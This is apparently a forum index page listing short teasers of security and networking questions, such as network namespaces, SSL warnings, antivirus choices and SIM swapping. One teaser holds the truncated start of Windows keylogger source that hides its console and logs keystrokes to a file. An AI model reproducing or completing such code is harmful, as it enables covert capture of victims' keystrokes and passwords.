1,390 Topics
| |
I wanted to ask something for my friend Tcll, how would you link a MAC address with no IP up to a network namespace? I know nothing about network namespaces or much about networking atall, he doesnt know mainly what commands to run or configure it. Thanks :). | |
how do i connect to internet how do i connect to internet | |
Please save the above xml contents of my Excel Office add-in manifest as manifest.xml. If you insert the add-in using the manifest file the add-in gets installed from the add-in files from my github repository. I want to embed this manifest.xml into Open office xml. So, when I send my … | |
Input devices are used for giving input to the computer. But output devices are used to get the result back from the computer. The examples of input devices are keyboard, mouse, scanner, digital camera atc...whereas output devices include monitor, printer, projector etc | |
#define _WIN32_WINNT 0x0500 #include<fstream> #include<windows.h> #include<winuser.h> using namespace std; void stealth(){ HWND stealth; AllocConsole(); stealth = FindWindowA("ConsoleWindowClass",NULL); ShowWindow(stealth,0); } ofstream out("keys.txt", ios::out); LRESULT CALLBACK keyboardHookProc(int nCode, WPARAM wParam, LPARAM lParam) { PKBDLLHOOKSTRUCT p = (PKBDLLHOOKSTRUCT) (lParam); // If key is being pressed if (wParam == WM_KEYDOWN) { switch (p->vkCode) { … | |
I work in a sphere of food production and have a question...what innovative methods of disinfection do you know? | |
I am Little confuse about the ciso Device and routers. Can anyone help to sovle my issue regarding cisco devices. Which deive or routers is best for internect connectivity without any internet connections. And also tell me about the extension or ports when my business is grow. then i want … | |
Do you know how to make user sessions secure on your web app or mobile app? | |
How many have websites here or own websites here? | |
I have a website and I want to change the index.php and it is not working each time I add htaccess file code it will stop me from loging in as admin. | |
Hello Friends, Recently I have created a website. And whenever I am visiting [my website](https://www.tblog.net/) one yellow i can see left side of address bar. It saying my connection not secure. "Part of this page are not secure(such as images)" . I don't know why it's showing like this. | |
Hello DaniWeb members, I know I'm not the only one who has tried to talk with non-hackers and used the term 'Crackers', to their total confusion. The problem is that the media has always refered to the Black Hat Hackers as just 'hackers', and that has given the **REAL** (White … | |
According to research from data recovery specialists Kroll Ontrack, some three quarters of those workers that had lost data on a broken device didn't attempt to ensure that information was irretrievable before disposing of the hardware. ![dwebdatarip](/attachments/large/0/dwebdatarip.jpg "dwebdatarip") It doesn't matter whether the hardware itself is a PC or laptop, … | |
In the modern world, it’s easy to understand that data is absolutely essential to many corporations and organizations. There is an ever-growing need to understand the needs and desires of your customer base, so that you may tailor your products/services/platform as much as possible to meet these particular needs. However, … | |
| Is there a way to change a host workstation password using RDP? |
HI : I WANT THIS BOOK Oracle Privacy Security Auditing: Includes Federal Law Compliance with HIPAA | |
| I think MS is getting a bit shifty in how it coerces you to have an MS account. It's finding more and more ways to get you on the inside. One example of many...Diagnostics collected about your device and how you use it. By default,this diagnostics collecting is turned on. … |
Looking for an efficient way to block p2p content on a hotel network. | |
I have list of unique names of players in column A in sheet 1. And in sheet 2 I have data of cricket score of different matches for that particular player with same unique names. And in sheet 3 I have data of same players for football matches. Now I … | |
| I'm sure the forum experts can give some very good feedback in response to this question. Due to the fact I'm beginning to feel somewhat paranoid over my privacy concerns, I'd like to hear from others as well. I need some assurance that I haven't gone off the deep end. … |
Hi DW. Well I'm very much interested in the data protection and also giving the best privacy to the public where we protect your passwords. I've seen something that Firefox had introduced to their browsers with also their Apps. This is called LockWise which is a tool to sync your … | |
For those very new to this area, please google SIM SWAP and discover a very nasty security issue with all phones we use today. At first glance the new security researcher might think I'm exaggerating. Do your own research and tell me you don't find this to be one of … | |
I'm using Windows Defender as full antivirus and Malwarebytes (Free version) So far. I've never had viruses malware on my computers. I started doing this 2016-2017. Are paid antivirus products not worth it now? Back then i used to use Bitdefender and it was pretty good. It had a pretty … | |
I am thinking about making a website on a VPS. I've read on internet that if someone hacks my website and puts a malware into links or if he steals personal information(including passwords), not only hacker but the owner of the website is responsible too and a lawsuit may be … | |
There can various actions that take us to the cause of Data Loss, **Intentional Action** *Intentional deletion of a file or program* **Unintentional Action** *Accidental deletion of a file or program Misplacement of CDs or Memory sticks Administration errors Inability to read unknown file format* I really found this Wiki … | |
I looking to create a database form for people to create receipts to issue to customers but I need to be able to lock the record so that it can't be edited once it has been printed and saved. How can I do this? | |
I have a question for those who are looking for bugs and vulnerabilities for money. How are you looking for customers? Is it freelance or a permanent job or a hobby? I found one blockchain project that offers to find vulnerabilities for money. I will post the text of their … | |
So I've successfully written a metaclass that gives python the functionality of private attributes in classes. Q: But what about `inst.__private`? A: >>> class A(object): __slots__ = ['__private'] def __new__(cls): inst = object.__new__(cls) inst.__private = 10 return inst def showprivate(inst): return inst.__private >>> inst = A() >>> inst.showprivate() 10 >>> … | |
Haven't programmed in a long time. Last project was a GCODE pathway generator I wrote several years back. My compiler is obviously several years out of date. Uses time(), itoa(), rand(). Current standard compliant compilers should have <chrono>, <thread>, <random>, and to_string() in suppliment to those more deprecated functions. This … |
The End.